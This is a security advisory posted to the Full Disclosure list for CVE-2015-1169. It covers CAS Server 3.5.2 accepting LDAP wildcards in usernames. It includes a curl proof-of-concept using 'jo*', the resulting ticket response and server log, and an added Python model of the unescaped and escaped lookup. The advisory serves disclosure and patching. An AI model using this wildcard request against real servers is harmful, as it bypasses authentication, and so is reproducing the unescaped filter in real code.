Message-ID: <CAFCb7ujG562x5DwhF_+zJQCh5om+Ux-4tur6kJWa21QHFR3T6A@mail.gmail.com>
Date: Wed, 21 Jan 2015 12:49:38 -0200
From: "J. Tozo" <juniorbsd@...il.com>
To: oss-security@...ts.openwall.com, fulldisclosure@...lists.org
Subject: [FD] CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to
 bypass LDAP authentication via crafted wildcards.

=====[Alligator Security Team - Security Advisory]========

  CVE-2015-1169 - CAS Server 3.5.2 allows remote attackers to bypass LDAP
authentication via crafted wildcards.

  Reporter: José Tozo  < juniorbsd () gmail com >

=====[Table of Contents]==================================

1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References

=====[1. Background]======================================

 CAS is an authentication system originally created by Yale University to
provide a trusted way for an application to authenticate a user.

=====[2. Detailed description]============================

A valid username and password are required.

Given a username johndoe and a password superpass, you can successfully
log in using wildcards:

username: jo*
password: superpass

The login succeeds only if the LDAP bind search returns exactly one
member.

The vulnerability described in this document can be validated using the
following example:

Client Request:
root@...hine:/# curl -k -L -d "username=jo%2A&password=superpass"
https://login.cas-server.com/v1/tickets

(note that * was URL-encoded as %2A)

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html>
   <head>
      <title>201 The request has been fulfilled and resulted in a new
resource being created</title>
   </head>
   <body>
      <h1>TGT Created</h1>
      <form action="
https://xxx.xxx.xxx.xxx/v1/tickets/TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz"
method="POST">Service:<input type="text" name="service" value=""><br><input
type="submit" value="Submit"></form>
   </body>
</html>

Server log:
=============================================================
WHO: [username: jo*]
WHAT: TGT-76-ABTSuXWB7sECDGqbe5W4jyxR43YYiTubPsEup9m4gNFpytGSaz
ACTION: TICKET_GRANTING_TICKET_CREATED
APPLICATION: CAS
WHEN: Tue Jan 20 18:38:17 BRST 2015
CLIENT IP ADDRESS: xxx.xxx.xxx.xxx
SERVER IP ADDRESS: xxx.xxx.xxx.xxx
=============================================================
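As an added illustration (not code from the advisory or from CAS itself), the following Python models the search-then-bind flow the advisory describes: with the submitted username placed unescaped into the filter, `(uid=jo*)` resolves to johndoe's entry whenever it is the only match and the bind then succeeds with his password, whereas escaping the value per RFC 4515 turns `jo*` into the literal `jo\2a`, which matches nothing. The directory entries are constructed sample data.

```python
import re

# Constructed sample directory standing in for the LDAP tree (not from the advisory).
DIRECTORY = [
    {"dn": "uid=johndoe,ou=people,dc=example,dc=com", "uid": "johndoe", "password": "superpass"},
    {"dn": "uid=janedoe,ou=people,dc=example,dc=com", "uid": "janedoe", "password": "othersecret"},
]


def escape_filter_value(value: str) -> str:
    """Escape a value for use inside an LDAP search filter (RFC 4515, section 3)."""
    return "".join("\\%02x" % ord(c) if c in "*()\\\x00" else c for c in value)


def _search_uid(filter_value: str) -> list:
    """Toy evaluator for the filter (uid=<filter_value>): an unescaped '*' is a
    wildcard, a '\\xx' hex escape is the literal character, anything else matches itself."""
    tokens = re.findall(r"\\[0-9a-fA-F]{2}|\*|.", filter_value)

    def literal(t):
        return chr(int(t[1:], 16)) if t.startswith("\\") else t

    regex = "".join(".*" if t == "*" else re.escape(literal(t)) for t in tokens)
    return [e for e in DIRECTORY if re.fullmatch(regex, e["uid"])]


def authenticate(username: str, password: str, escape: bool = True):
    """Search-then-bind: resolve the user's DN by uid, then 'bind' with the password.
    escape=False reproduces the CAS 3.5.2 behaviour the advisory describes; the fix
    is to escape the submitted username before it is placed in the filter."""
    value = escape_filter_value(username) if escape else username
    entries = _search_uid(value)
    if len(entries) != 1:  # no match, or an ambiguous wildcard: refuse to bind
        return None
    entry = entries[0]
    if entry["password"] != password:  # stands in for the LDAP simple bind
        return None
    return entry["dn"]


if __name__ == "__main__":
    # Unescaped flow: 'jo*' is the sole match for johndoe, so the bind succeeds.
    print(authenticate("jo*", "superpass", escape=False))
    # Hardened flow: the filter becomes (uid=jo\2a), which matches no entry.
    print(authenticate("jo*", "superpass", escape=True))
```

A useful second line of defence, independent of filter escaping, is to compare the uid of the resolved entry against the username the client actually submitted and reject the login on any mismatch.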

=====[3. Other contexts & solutions]======================

 To obtain the fix, you have to upgrade to at least version 3.5.3.
Newer versions, such as CAS 4.0.0 and above, are not vulnerable.

=====[4. Timeline]========================================

29/12/14 Vendor notification.
14/01/15 Vendor rolled out new version 3.5.3.
17/01/15 Mitre assigned CVE-2015-1169.
21/01/15 Disclosure date.

=====[5. References]=======================================

1 - https://github.com/Jasig/cas/pull/411
2 - https://github.com/Jasig/cas/commit/7de61b4c6244af9ff8e75a2c92a570f3b075309c

-- 
Regards,

 Tozo

_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
